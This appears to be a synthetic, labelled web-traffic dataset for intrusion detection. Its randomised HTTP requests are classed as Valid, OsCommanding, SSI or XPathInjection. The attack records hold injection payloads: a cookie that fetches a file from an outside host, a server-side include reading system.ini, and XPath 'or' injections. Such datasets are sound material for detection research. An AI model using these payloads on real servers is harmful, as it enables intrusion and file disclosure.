Via: FTP/7.6 12.222.122.61, 7.8 www.46ryntI.js
Transfer-Encoding: tirnn; tiYn=N0u4wiao
Upgrade: 1s0oa/6.2, rar/3.6, oi9ah/7.0
Warning: 495 239.86.251.13 "Unj3srseiitsro" 
X-Forwarded-For: 0.184.13.124
X-Serial-Number: 48297447626041948628
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 14792
Start - Id: 18126
class: Valid
GET /tnmd9ReC/7ps3/tradChmoroizchOr/KLWrYKeoptNKJRIF.sh?ipdaelectWottab=25980214&idsoAtr17wss=dacceptg HTTP/1.1
Host: 130.131.121.209
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 102.113.167.199
Cookie: bs3=sb;ud1Ad=ioirz'x<atsatnWcpasswdI;eerto=381;adreh3ttetuek=eC0ettltl;hIvincludeg2yQ=6858;enragwexikbebx=e eesr@perl
Cookie2: $Version="10"
Date: Thu, 27 Oct 05 18:09:51 GMT
ETag: W/"rhcS_4hO9_XEsNz8dd"
Expect: 100-continue
From: hwDyshr1@ecneonN.be
If-Modified-Since: Thu, 18 May 06 14:55:22 CET
If-Unmodified-Since: Sun, 10 Jan 10 03:53:40 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 19 May 09 10:51:52 GMT
Max-Forwards: 1220
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: iisE najhde=go0akSs
Authorization: Digest response="Ad8E23477426A4d43BCEB1CbCdbD870f"
Range: 24-,21839-647
Referer: /t1rb/05Tat/iae7eosn/kis6n/r6eE.txt
TE: trailers
Trailer: Range
User-Agent: Mozilla/3.2 (Windows; U; Win 9x 2.2; 5W-sa; rv:9.1.8) Gecko/58664562
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4077x543
Via: 5.5 www.sbfeoee.tiff, 5.4 185.137.71.2, 6.7 255.110.45.83
Transfer-Encoding: identity
Upgrade: 8rhetT/2.2, 0fno/6.2, Swi/2.0, ehe/1.3, iaeicr/1.5
Warning: 432 www.uatfoT.gif "ojer8gtnteao0ut" "Wed, 24 Mar 10 12:45:46 GMT"
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 0610755676490078
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18126
Start - Id: 14968
class: Valid
GET /tmfuOqk/p68afFoWGUqldQ6/j8bUZ./1a/ileXXruufMiTyurIJ/5vteAaegwieT/0eikra6Ei3ahe/7anu6@TZnQE3/rRcFg_yL3Ym/zievalacceptUghcopyHA.mdb?jonxey2rmdresk=hh&txteiotbqvpisur=eiyrczlhdieo&ia0ia4jhixlsY=3594671486&dhomehbgsoundHv.=ossonhlinkes%26tr%3Fgy&etnbtee=066668349&etsnartslrc0mx=0061&ny.K3D7=50&tdntrabr=491136&e0hh5sac9aN=insdm HTTP/1.0
Host: www.swfensw.be
Connection: keep-alive
Accept: application/*;q=0.9, text/*;q=0.4, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 28.161.121.153
Cookie: wuieeokeb=n-Or6NBrHq;w4cesd=ixy;ewyograo=dq_Xsa@ZP;cbTfvms=b2-u;e3hceaN=lhre2aetShee;EqeUeg=8ma9rsVwwe1r
Cookie2: $Version="57"
Date: Thu, 27 Aug 09 03:41:59 CET
ETag: "jF8fuUZeHond1hrgl"
Expect: 9etnih=9Srde9i
From: dsbsnNf@eoceh.ch
If-Modified-Since: Thu, 22 Oct 09 16:49:49 CET
If-Unmodified-Since: Fri, 24 Nov 06 04:04:59 UTC
If-Match: "IOD@T3XE2n5m6I9"
If-None-Match: "OtQMx27ES_6hh2YbRrxn"
If-Range: Sat, 03 May 08 04:07:13 CET
Max-Forwards: 6
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM dWV2ZWVpM0xndGxFYWVhYWhsZ3J3YWUxcmJ0cXNmdGE3anBybm05cnlldzFh
Authorization: Digest realm
Range: -17567
Referer: http://sMmLea.be/Aceb.txt
TE: trailers,gzip;q=0.1,gzip;q=0.6
Trailer: If-Unmodified-Since
User-Agent: i30theay/8.0.0
UA-CPU: PowerPC
UA-Disp: 6748,0527,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8266x800
Via: 7.4 158.183.1.191
Transfer-Encoding: gzip
Upgrade: ug6bde/8.6, aewad/9.9, ltra/3.4
Warning: 436 73.117.227.57:6 "thodictf5aXh1rett" "Sun, 19 Apr 09 22:34:03 UTC"
X-Forwarded-For: 217.55.216.75
X-Serial-Number: 158686381572781
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 14968
Start - Id: 33897
class: Valid
POST /otrotA/lfohphhc5/nfdtm/Taeqntbcwc5vlpuoSE94/r5gmY3faGe.tiff? HTTP/1.1
Content-Length: 216
Content-Language: seaAo,l2e,rtrrd
Content-Encoding: compress
Content-Location: http://www.ydsel1.uk/glh0/EtNdia2/indse/97ggy/ty47sHe.sh
Content-MD5: dHRlbXRydGVlYWVrMWkydA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 May 06 18:13:59 GMT
Last-Modified: Sat, 24 Dec 05 19:09:13 CET
Host: www.DxlnBp.cz
Connection: otht
Accept: video/*;q=0.1
Accept-Charset: windows-1252;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 68.59.175.92
Cookie: yickTwrt1mbre=>whererboot.ini;CJJOcj9o=9w
Cookie2: $Version="187"
Date: Wed, 15 Mar 06 19:55:19 GMT
ETag: "yty6mQFBlm2dqjw"
Expect: ieb2qasi=Otwexie9;htae4ao
From: tietc@t0ytt.net
If-Modified-Since: Mon, 14 Aug 06 14:35:28 UTC
If-Unmodified-Since: Wed, 14 Apr 04 16:28:25 CET
If-Match: *
If-None-Match: "n4sbpKK9a1WHwdSNV7h"
If-Range: Sun, 28 May 06 20:03:10 CET
Max-Forwards: 12
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest username="3htdpnp1"
Authorization: les4s rtcIc=tswor
Range: 254982-39
Referer: http://www.n7aasasq.st/Eai9ww.wav
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/6.5 (X11; U; Linux i586 2.8; ee-hh; rv:0.9.4) Gecko/03530498
UA-CPU: PowerPC
UA-Disp: 4653,644,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1982x002
Via: HTTP/8.9 www.ey8esl.shtml
Transfer-Encoding: scau2
Upgrade: ict/4.3, tseu/9.1, eolz/4.5, eeiuje/9.5
Warning: 650 www.SRhlh0nf.jpeg "naorss8mXmrab" "Sat, 28 Mar 09 21:13:32 GMT"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 6132370347859311136
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

cueooret=o18&IbooiaooZ3itdE=lNa&adsv= nxdhtpassrsC6m==&C7.oG=lsamoO&oho98MeNb6=4490728972&bgaoyo=t4E&lInrageopmm=rvt;styles~5lz8vy &d5aeejenk7Br0=37&Lfwra=145505&ewhcn4=tMr&iTCeht1rhsnnlq=<eandiservicesNidh

End - Id: 33897
Start - Id: 27332
class: Valid
GET /k@.msf? HTTP/1.1
Host: 81.114.4.135
Connection: close
Accept: image/png
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: nserl-wfetre, holserh-a;q=0.7, 83nOon-O;q=0.8
Cache-Control: ne1s='s'
Client-ip: 158.76.53.178
Cookie: ox=nhih6aw7hsn4wto;hoay0h=o;e<;oAke6zahtefde=?e;Q2g6=2638456
Cookie2: $Version="7"
Date: Tue, 21 Jul 09 07:00:55 CET
ETag: "1miNIizWdS3oANro"
Expect: 100-continue
From: toe4iu@onagtDi.st
If-Modified-Since: Sat, 01 Sep 07 03:52:04 GMT
If-Unmodified-Since: Wed, 28 Nov 07 10:54:00 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 18 Jun 08 19:13:52 UTC
Max-Forwards: 2
MIME-Version: 2.2
Pragma: dPiua0=oocTdF
Proxy-Authorization: Digest uri=http://toclc.be/fqo7nch/h5ac7/porhotna.mdb
Authorization: Digest response="0BfcF1A50BCa10BC884aF1cBBDbC634a"
Range: -49505
Referer: http://www.d7Et.fr/Eiii.fgf
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 0.5; cn-4h; rv:1.9.7) Gecko/65757601
UA-CPU: StrongARM
UA-Disp: 3109,349,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3599x969
Via: HTTP/4.4 97.76.223.135, 5.6 178.120.167.110, 8.8 www.woti.htm
Transfer-Encoding: deflate
Upgrade: hhw/4.3, meohl/0.7, juO/1.6, hnctge/3.3
Warning: 310 www.wIblei.png "anibiOgti2Un" "Sun, 21 Feb 10 08:44:37 CET"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 99615814182881268
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27332
Start - Id: 42962
class: OsCommanding
GET /lsNy.swf? HTTP/1.1
Host: www.lail.gov
Connection: keep-alive
Accept: text/*, image/gif;q=0.9, application/*
Accept-Charset: iso-8859-5, iso-8859-5;q=0.5, cp-950, windows-1257;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=3457
Client-ip: 162.231.56.83
Cookie: tv=\n uftp -p   www.ntonanol.com     /tima/mendneinit/ri/liil/itil/arlail;mr=ae6;srTimnilas9=552270678;ceaaaaebj=h2WXDUd;cs7lsasxnnorel=361;OhfoolpNjuysnsp=lnr4to
Cookie2: $Version="940"
Date: Sat, 11 Feb 06 16:36:25 UTC
ETag: W/"mg6-z5rmN_exu3fsjr"
From: aaoq@n8t5el2e.org
If-Modified-Since: Thu, 02 Apr 09 19:54:15 UTC
If-Match: "9dbwaVEppcCeNSEH8K"
If-None-Match: "@UsSjeumr3ha.y3iml"
If-Range: Wed, 15 Aug 07 01:52:13 UTC
Max-Forwards: 4
Pragma: no-cache
Authorization: NTLM c2VhdG55dW90ZWRvYWVwYWg4b2NnY3RhZVNuY3FyOTFvb29kaW1haXU2aWFl
Referer: http://psaeac.fr/pesae/bseqzB1h/trszhh.zip
TE: trailers,deflate;q=0.7
User-Agent: u7rAus3t http://www.ptle9q2m.org
UA-Disp: 8981,079,32
Via: HTTP/6.9 202.51.100.48
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42962
Start - Id: 40555
class: SSI
GET /h9e4hmsas/loxs4ueGnlt/djYuHM3MDTSV6NPsv/afZM6i4BCpe/rdnateaeIcsacoTd/ewbpszdlsr-/sgtNuvorirriaSFBdi/srtsRiaaDautgau/oRsglEnxOsTpR9CJ47/iKgldXt/r0p.L@u8Djrhoqvqc/tmewaEblsa7jzu2.msf?ilDnoa=esfTM9l0.t&ese=+h8bA4IeabIa&ad=ehewrree6pu&ataqwosh6tBU=sawp-&rnSsdt7m06reae=iinsi&br2aNwf=%3C%21--++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&4ln5jchrbr43c=5et&tet7te=inhPhdocxh3%28a&fa4=eCvS%7Ej6%3Dtoon+danasfo&D_@k81jUNw=dSkHYpzbuY&G-UVincludeqX8pmTY=sE&azN3ii6=330340939 HTTP/1.0
Host: 155.8.198.146
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 194.18.169.91
Cookie: efelcEr=nag;zWTzZ.8GLW=2N-mtX;Qy4mbinGgUnullm=eenv;R2Enm=1p
Cookie2: $Version="29"
Date: Thu, 28 Dec 06 12:10:21 UTC
ETag: "IzmNlSU5@VsrmyU8Z"
Expect: 100-continue
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Mon, 29 May 06 14:13:58 CET
If-Unmodified-Since: Mon, 12 Feb 07 22:37:23 UTC
If-Match: "hH@S@u7r3O.loyu"
If-None-Match: *
If-Range: Tue, 31 Oct 06 03:30:01 UTC
Max-Forwards: 08
Pragma: no-cache
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest nc=04bCfCaa
Range: 092301-3,261-278,-586839
Referer: /faipiae/iay6r/kzencR.mpeg
TE: gzip
Trailer: Pragma
User-Agent: eJ4za8W http://www.lEoe.org
UA-Disp: 9897,2290,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 6.3 www.amubetoe.html:9307, 9.6 www.ob6x.shtml, z0vh/0.6 64.64.64.250
Transfer-Encoding: identity
Upgrade: ihigio/5.3, axaa/8.6, iom/3.5, erte4e/3.3
Warning: 885 www.ctsaoon.js "2nm3fnnnfehteoPv" "Sun, 30 Sep 07 18:31:53 UTC"
X-Forwarded-For: 62.56.145.236
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40555
Start - Id: 9888
class: Valid
GET /fa32jK.Fg/S8sndavelkrtocd.mdb?sefze=5uujwGIje1nyswdOSi&Snel=%26ewe4tSaeh8&hszwddalloakCe=Cn+6hnN%24&ikaeeiio=3851341&nuun=eb%40GDX&1vANH=suaa&ichEbt=zTh&cstnj=dnywdA0ntialern HTTP/1.1
Host: 108.78.246.177:80
Connection: close
Accept: application/x-tar;q=0.2, text/*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.9
Accept-Language: e-0inny4;q=0.8, r-0a
Cache-Control: max-stale=7
Client-ip: 60.255.0.254
Cookie: lh6o=+ocopyt4;Gafe=Irqaxs8w3vtoplaleA
Cookie2: $Version="55"
Date: Mon, 07 Apr 08 16:04:44 UTC
ETag: W/"ps6a-nD6aCWrXYLTxfK"
Expect: 100-continue
From: rnmt@yebEnsntsn.org
If-Modified-Since: Sun, 18 May 08 22:02:09 UTC
If-Unmodified-Since: Tue, 17 Nov 09 10:54:08 CET
If-Match: "vx32EqNzXR4.@IhWQf9"
If-None-Match: *
If-Range: *
Max-Forwards: 1702
MIME-Version: 7.8
Pragma: st=a
Proxy-Authorization: Basic eWZhbTp0dXRoNjU=
Authorization: tc0sha Idttxwiz=pceoa0p
Range: 909-988
Referer: /enmt3J9l/ereb/t5dseam/spben/lalsun.shtml
TE: deflate
Trailer: Max-Forwards
User-Agent: nn.Ggls http://www.theta.fr
UA-CPU: MIPS
UA-Disp: 042,750,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4156x0641
Via: 0.7 www.Ytsptt.css
Transfer-Encoding: compress
Upgrade: nng/1.2, rrve/4.9, iogns/6.7, qipf/8.8
Warning: 400 www.satoatm.gif "qstaeInaenai" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 278768
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9888
Start - Id: 27510
class: Valid
GET /eIinsoaallrnjcoe/u.lpr3N4SFHvrY/uasJap/Mhcaaiefl/ele4ngEdinotihItocs/iZy/Zu/RW0d0jhhMjd_wget/8vqscriptX8Rrsystem@zxK.mdb?rOoeheunoAnIrwt=rdto1nlm&zVdpsmipbLw=60 HTTP/1.1
Host: www.ntenEd.biz
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 240.72.18.67
Cookie: 1uolYio=nsw rebTuhtcsnn;ltnpnn4cqaee1bi=97;vnwk=ninsert;ce=whRwexecl;ndolnicCnt4ie=|eoiEt afw
Cookie2: $Version="1"
Date: Wed, 11 Oct 06 21:16:27 UTC
ETag: "fvjWGc7zSZjCcXPT"
Expect: me45h5b
From: atatUu@1aamxey.uk
If-Modified-Since: Tue, 16 Aug 05 21:09:24 CET
If-Unmodified-Since: Sat, 08 Mar 08 14:56:30 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 12 Sep 05 01:41:19 CET
Max-Forwards: 6204
MIME-Version: 3.2
Pragma: 7seirwn=9
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://wceCo.de/npeIc/rthnrsy/pnttf.pdf
Range: 1237-98,8233-,5148-10
Referer: /m01p.msf
TE: deflate
Trailer: Proxy-Authorization
User-Agent: sAa5Q2XA http://www.rsnyum.be
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5041x3321
Via: HTTP/4.2 www.2ttoeiwt.jpeg, grha3/4.0 www.ahUadek.png
Transfer-Encoding: uotUnv
Upgrade: ieiie/4.6, kord/5.1, Nat/2.2
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 102.128.80.116
X-Serial-Number: 8783234451
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27510
Start - Id: 5726
class: Valid
POST /tS/0Bboot.iniLvbscript2L8Pq2Zpv7/weoiqonedae2eaiA4/ursErnpmqt9fsrmd3g.sh? HTTP/1.1
Content-Length: 278
Content-Language: 0etnez2,olbt6rTe,pniovn7
Content-Encoding: compress
Content-Location: /oeye.rar
Content-MD5: Y21hc2dldnlJeGhtYXNlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Oct 04 21:16:43 UTC
Last-Modified: Sun, 29 Aug 04 20:12:58 CET
Host: 54.241.151.9
Connection: close
Accept: text/html
Accept-Charset: x-mac-arabic, iso-10646-ucs-2;q=0.5, windows-1257
Accept-Encoding: compress;q=0.3, compress;q=0.0, deflate;q=0.6, compress;q=0.5
Accept-Language: nemswSd9-0iAt;q=0.7, stnoq2gu-rus4c;q=0.7, oen-Xh;q=0.1
Cache-Control: max-age=471
Client-ip: 219.146.51.19
Cookie: jSaa=no5Pn1;rrsrtgwaeaMehiw=0@dQJb;scriptKu6d=hEsg;og6a=359605;KriDLnetcats3_Jd=2625920
Cookie2: $Version="54"
Date: Mon, 13 Apr 09 11:07:28 GMT
ETag: W/"DBi8_f7SmHaEbP8t"
Expect: 100-continue
From: ototLn2u@5heey.uk
If-Modified-Since: Wed, 16 Apr 08 02:01:32 UTC
If-Unmodified-Since: Tue, 02 May 06 22:08:19 UTC
If-Match: *
If-None-Match: "WPY6Zq1yYD.Bv@."
If-Range: Mon, 21 Jun 04 18:46:31 UTC
Max-Forwards: 210
MIME-Version: 9.3
Pragma: M=getam
Proxy-Authorization: NTLM YWVueHJpMXNlaGJoRHRqcmd4YW9Tck5lN29hZWhuQkkzZG1mbG9z
Authorization: NTLM ZWFsZWFvcnpzckJmSW5LZTVvbm1ldGVjbGludGU1TG00bG90YnU=
Range: 40090-
Referer: http://www.Oikotfm6.fr/hihl/10hyrM/nxjlssni.jpeg
TE: trailers,chunked;q=0.1,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.9 (X11; U; Open BSD i586 1.9; 7i-nq; rv:5.9.4) Gecko/54693938
UA-CPU: PowerPC
UA-Disp: 830,2987,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3416x9061
Via: HTTP/6.4 www.wIaoznom.js, HTTP/9.8 204.236.97.165, 0.7 www.fSd9ra.jpg
Transfer-Encoding: deflate
Upgrade: dsmp/7.1, uiviit/8.6
Warning: 489 154.132.50.60 "g8mjyetalehBscHn" 
X-Forwarded-For: 129.100.56.49
X-Serial-Number: 7835393170
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

phmhxtec=mtsi&iluht4t8iowobn= ((&ce=iyInbinusrnetcatnetcati&n50=iids@log|eog6&c1ojFSereq=031&eaeNehpqtio8S=i1in]var34|raE2a&ts1=lel&oetcJaccess_loghHk4Q=syj&i1haadgawqbeh=c0edshutdownsi%eew|l&fyN=eg&prutc6mitteruso=ebwgettynimg&saggE=13349&Catultvucaze=6&Ti=Iebe

End - Id: 5726
Start - Id: 34160
class: Valid
PUT /mexapYRpAAn/uticO8ybLpieIajtrugl/r9_dceZWFyY_9KUAMI/sEEydtMti9l4/b8UVHs/aqfBDKfrD3NWqEzAJWy_/wmLpbCcUFd7hP/qttfoaplgl/iilfWins/d1YX.VYXEOg5/gejewha/0ons.nsf? HTTP/1.0
Content-Length: 140
Content-Language: ssna2,ni
Content-Encoding: deflate
Content-Location: http://okeawrm.st/h7oea/fltdie/riw7hy/u9sD/tuewom1e.nsf
Content-MD5: b2Flc2lrdHR0dGJCeVRzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Nov 07 11:43:50 CET
Last-Modified: Tue, 02 May 06 23:39:16 UTC
Host: www.gbMie.gov
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: esasl=hw
Client-ip: 112.140.17.197
Cookie: a2dasrelQlsot=u;irhtalenmonsen=otIez;hfr6im=47665833;Toeoaot=5076915994
Cookie2: $Version="0"
Date: Fri, 07 Dec 07 19:45:32 GMT
ETag: "W6RIxcRFJaUsrHepwgOU"
Expect: 100-continue
From: ol8k@oiren.st
If-Modified-Since: Tue, 29 Mar 05 20:05:11 CET
If-Unmodified-Since: Sun, 08 Jul 07 05:07:59 UTC
If-Match: *
If-None-Match: "icP@LPITUg@y_LQeq-JY"
If-Range: *
Max-Forwards: 1112
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: sahe tsshe=ajtnobe
Authorization: Digest username="srua"
Range: 713-,7885-54
Referer: http://mdgdo.net/neh5he.exe
TE: gzip;q=0.5,trailers
Trailer: Connection
User-Agent: 1dfee/3.8.9.7.3
UA-CPU: x86
UA-Disp: 892,7658,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 995x590
Via: HTTP/1.5 150.116.55.166, 1.4 235.34.46.120, eDteit/5.8 216.69.53.164
Transfer-Encoding: ao3hgh
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 761 204.87.63.171 "4sa9bahilwl" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

4wtyeee3rin=28&suait=or&9m2=57&1gseRaacm7=Owm7a~ uinehtlhra-H&R1child7nf=2cslhreYo&damnf8neaA2fi3=o7h.&hw05asSo=EAsLhmiSotsdash&iRr6=68431

End - Id: 34160
Start - Id: 32628
class: Valid
POST /o.j7txCoLIazNNc9Ck./igIsst2qehhgsnzau.html? HTTP/1.1
Content-Length: 39
Content-Language: n,sywv0,bq
Content-Encoding: identity
Content-Location: http://i9Ffbel.cz/glse/0leaEbri/b3a0e/thte/rjgb.php4
Content-MD5: dGVzVHRsYW83dGEyUklhRA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Aug 07 07:16:34 UTC
Last-Modified: Sat, 03 Feb 07 12:04:47 UTC
Host: www.luhol.be
Connection: keep-alive
Accept: audio/*, text/*
Accept-Charset: x-mac-icelandic;q=0.0, x-mac-chinesetrad;q=0.5, cp-936, iso-8859-9
Accept-Encoding: deflate, gzip;q=0.1, deflate;q=0.9, deflate;q=0.1
Accept-Language: flox3hEc-YZ;q=0.3, fztciim-i, eHeE-aaaNes;q=0.3
Cache-Control: only-if-cached
Client-ip: 83.101.124.16
Cookie: thsciecs=q nes'qtahg;4TBu9= execdttowgr;nkT1J7O=91;tttOsrrdizHnioo= t+;fkh8u=adr
Cookie2: $Version="4"
Date: Sat, 19 Jun 04 16:34:07 GMT
ETag: W/"GzkqMzo-hqir2utZSC"
Expect: 100-continue
From: mhhvcrm@gtad.de
If-Modified-Since: Mon, 21 Aug 06 07:42:42 GMT
If-Unmodified-Since: Sun, 07 Jan 07 24:35:58 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 8.6
Pragma: owtgzwro=tdft
Proxy-Authorization: Digest nc=8Ce14fAB
Authorization: NTLM b3RvZWl1b3NzYWxlaWNtYmVOZWZ3cmY5QW9hZE1sMkVkYW5p
Range: 0-468
Referer: http://tiepan.gov/qc65raz/m3tno/iussnwe/yclaAxri.jpeg
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.6 (X11; U; Solaris 9.0; 4t-am; rv:2.0.6) Gecko/35488576
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x924
Via: 3.3 152.86.156.169, weoy/6.8 www.6eoa.js
Transfer-Encoding: gzip
Upgrade: Mit/0.5
Warning: 659 180.178.216.93 "eswsYtuMme" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 4855309378866511170
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

eish=tf@rlHmTik&nsesimGiopl7O=9g4ohon

End - Id: 32628
Start - Id: 35590
class: XPathInjection
GET /aah/eSJqenmkUMOSLP3Bw/hy1tHW5/1LddTxq2aHxwb2/t3heImOpfvetgilldhi/vgJ0iGRG6Bh/aSXPkXhOq8zgmhs3L6tp/ec6lChrnepNamxad2ue/hMxEeL1ekSY1xWRY03z/whSJN/e3woo6QIZfnU/orsiRIYu3a77Y3-.jpeg?vtner=om%27+or+%28i+++%3C+count%28razi%2Fchild%3A%3Atext%28%29%29++and++++j+%3C++++count%28eZuf%2Fchild%3A%3Acomment%28%29%29++++and++++k+++++%3C+count%283h%2Fchild%3A%3A*%29+++++%29+or++%27ni%27++++%3D+%27+++eKra2sh1%27+++++or&utlcn=neqn0&Tot=iSzL1f&tihgLg6=5h&Qwreplacew6=aLoemhi0seyZm&attgegaecsdgr=kfn%3Dealndrynrtn&9tsnigsht=ymlhe%26%3Bomm&dl3tioacotrreOe=961011&Edivprocessing-instructioncnFE28=xetn&i95KimzA=54920&0dt=xeuat&e7wqcdboek=meI&Lctm4ariret=eetgiemssebuzsogua&eharoo2sp9n=twheret%29yv%24%24i%7C HTTP/1.1
Host: www.vktpbs.de
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.0, compress;q=0.0, compress, deflate;q=0.5
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 146.199.243.126
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="8"
Date: Sun, 27 Apr 08 18:16:42 CET
ETag: W/"lcch2z22_L8yP9hkCD"
Expect: stHs
From: keef8S@qicoiNe.be
If-Modified-Since: Sat, 24 Jun 06 20:37:15 UTC
If-Unmodified-Since: Wed, 07 May 08 20:46:29 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "ROUscR3pkmOD.leDa"
If-Range: Tue, 20 Oct 09 08:25:20 GMT
Max-Forwards: 2660
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM b2RXcmx2M25sdGE2b3dvcmVIaGxuZWh5b2lzdGlXWGRvdnlvUm0xZXQxbU8zYm0=
Authorization: Basic bnNmc2k6MnAzYWM=
Range: 1278-6
Referer: http://upv7o2Ek.com/ddio4o/nenstOdi/trTaEe/prrm.exe
TE: trailers,trailers,chunked
Trailer: Accept-Language
User-Agent: CnATi0t
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 468x391
Via: FTP/0.9 211.51.240.176, HTTP/9.8 5.202.57.232, 3.5 128.216.105.127
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35590
Start - Id: 49013
class: XPathInjection
GET /ttyJ9s-/antr7xgzsnb5suae/kAgZmKU.msf?theoiLjc5ktQu=1betweenjwfimu+jo%5Cz8ewy&dAX_Nmp=fdeq&iro=8816799&ohleO=inht&OeetoecQl=swAsAstg8%3Adn6&eeidrowaberoag=tttc%5Dnrotew&f9waQUh0AX=Cohapq%27++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++%27otuQr%27+%3D+%27&aea2ojwo=t%7C&aiun8Pfnij=92348919&TWor7nnodercpOD=39449&qFI-7m6ppasswdt=Yt%25eossDenno&eeaitclld9=391001790&ftMufoeLtol3bi=n+&q.d5=8542 HTTP/1.1
Host: 186.246.70.93:0
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8;q=0.4, euc-jp, euc-jp;q=0.5, iso-8859-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 89.182.168.169
Cookie: @VFautoexeclBOQnph-R=00
Cookie2: $Version="3"
Date: Mon, 22 Mar 04 22:33:06 UTC
ETag: W/"A_OF1TsXBNTJNorCOij"
Expect: EtKttam=ESeh
From: mn1eatis@ye8qeam0O8.be
If-Modified-Since: Sun, 10 Aug 08 01:40:53 GMT
If-Unmodified-Since: Fri, 20 May 05 14:12:56 GMT
If-Match: "6iPmjwpG2ZsiYNDzyaH"
If-None-Match: *
If-Range: Tue, 12 Jun 07 12:08:15 GMT
Max-Forwards: 7828
MIME-Version: 9.3
Pragma: eT=eieet
Proxy-Authorization: NTLM aXNlcm54Q3Nsa2FvbmVOaWlvQWV0bG9uMXhqbHdvZTg=
Authorization: Basic YkVybmVyUjphZDlwZQ==
Range: -31
Referer: /mmr5I/ti9snek/nhsl/arar0.asmx
